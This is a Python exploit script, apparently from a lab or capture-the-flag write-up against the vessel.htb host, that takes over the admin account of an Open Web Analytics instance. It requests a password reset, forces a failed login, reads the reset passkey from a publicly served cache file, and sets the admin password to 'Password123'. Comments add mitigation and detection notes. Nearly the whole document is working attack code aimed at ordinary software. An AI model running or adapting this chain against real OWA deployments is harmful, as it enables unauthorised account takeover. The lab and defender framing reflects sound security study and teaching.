import requests, base64
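# Every request is sent through a local intercepting proxy so the whole chain
# can be inspected and kept as evidence for the write-up.
proxy = {'http': 'http://127.0.0.1:8080'}

if __name__ == '__main__':
    # Walk-through of an admin account takeover against the Open Web Analytics
    # instance on the vessel.htb lab host.
    #
    # Weakness shown: the password-reset passkey for a user ends up inside a
    # cache file under owa-data/caches/ that the web server hands out to
    # unauthenticated clients, so the reset secret can be read without access
    # to the mailbox it was meant for.
    #
    # Defender notes:
    #   * Mitigation: block web access to owa-data/caches/ (and the rest of
    #     owa-data/) at the web server, and run an OWA release that no longer
    #     exposes reset secrets through the cache.
    #   * Detection: a base.passwordResetRequest POST, a failed base.login,
    #     a GET for a .php file under /owa-data/caches/, and then a
    #     base.usersChangePassword POST from the same client, in that order.
    #     Any direct GET under /owa-data/caches/ is worth alerting on.
    with requests.session() as s:
        print("requesting admin reset")
        reset_form = {
            'owa_email_address': 'admin@vessel.htb',
            'owa_action': 'base.passwordResetRequest',
            'owa_submit': 'Request New Password',
        }
        s.post(
            "http://openwebanalytics.vessel.htb/index.php?owa_do=base.passwordResetForm",
            data=reset_form,
            proxies=proxy,
        )

        # NOTE(review): presumably this failed login is what makes the
        # application write the user record to its cache; confirm against
        # the application source.
        print("false login on admin")
        login_body = 'owa_user_id=admin&owa_password=password&owa_go=http%3A%2F%2Fopenwebanalytics.vessel.htb%2F&owa_action=base.login&owa_submit_btn=Login'
        s.post(
            'http://openwebanalytics.vessel.htb/index.php?owa_do=base.loginForm&owa_go=http%3A%2F%2Fopenwebanalytics.vessel.htb%2F&',
            data=login_body,
            proxies=proxy,
        )

        # The original listing sent this one request without the proxy, so it
        # was missing from the intercepted record; it now goes through it like
        # the others.
        r = s.get(
            'http://openwebanalytics.vessel.htb/owa-data/caches/1/owa_user/fafe1b60c24107ccd8f4562213e44849.php',
            proxies=proxy,
        )

        # Fixed offsets: drop a 9-character prefix and a 6-character suffix
        # and base64-decode what is left (presumably the wrapper the cache
        # file puts around its payload; verify against a real response).
        # These slices raise or yield garbage if the file layout differs.
        b = base64.b64decode(r.text[9:-6])

        # 32 characters at a fixed distance after the "temp_passkey" marker
        # in the decoded record; an IndexError here means the marker is absent.
        temp_pass = b.decode().split("temp_passkey")[1][57:89]
        print(temp_pass)

        change_body = f'owa_password=Password123&owa_password2=Password123&owa_k={temp_pass}&owa_action=base.usersChangePassword&owa_submit_btn=Save+Your+New+Password'
        h = {
            'Referer': 'http://openwebanalytics.vessel.htb/index.php?owa_do=base.usersChangePassword',
            'Origin': 'http://openwebanalytics.vessel.htb',
            'Content-Type': 'application/x-www-form-urlencoded',
        }

        # The status of this response is not checked, so the message below
        # reports the attempt, not a confirmed change.
        r = s.post(
            'http://openwebanalytics.vessel.htb/index.php?owa_do=base.usersChangePassword',
            headers=h,
            data=change_body,
            proxies=proxy,
        )
        print("Password changed to 'Password123'")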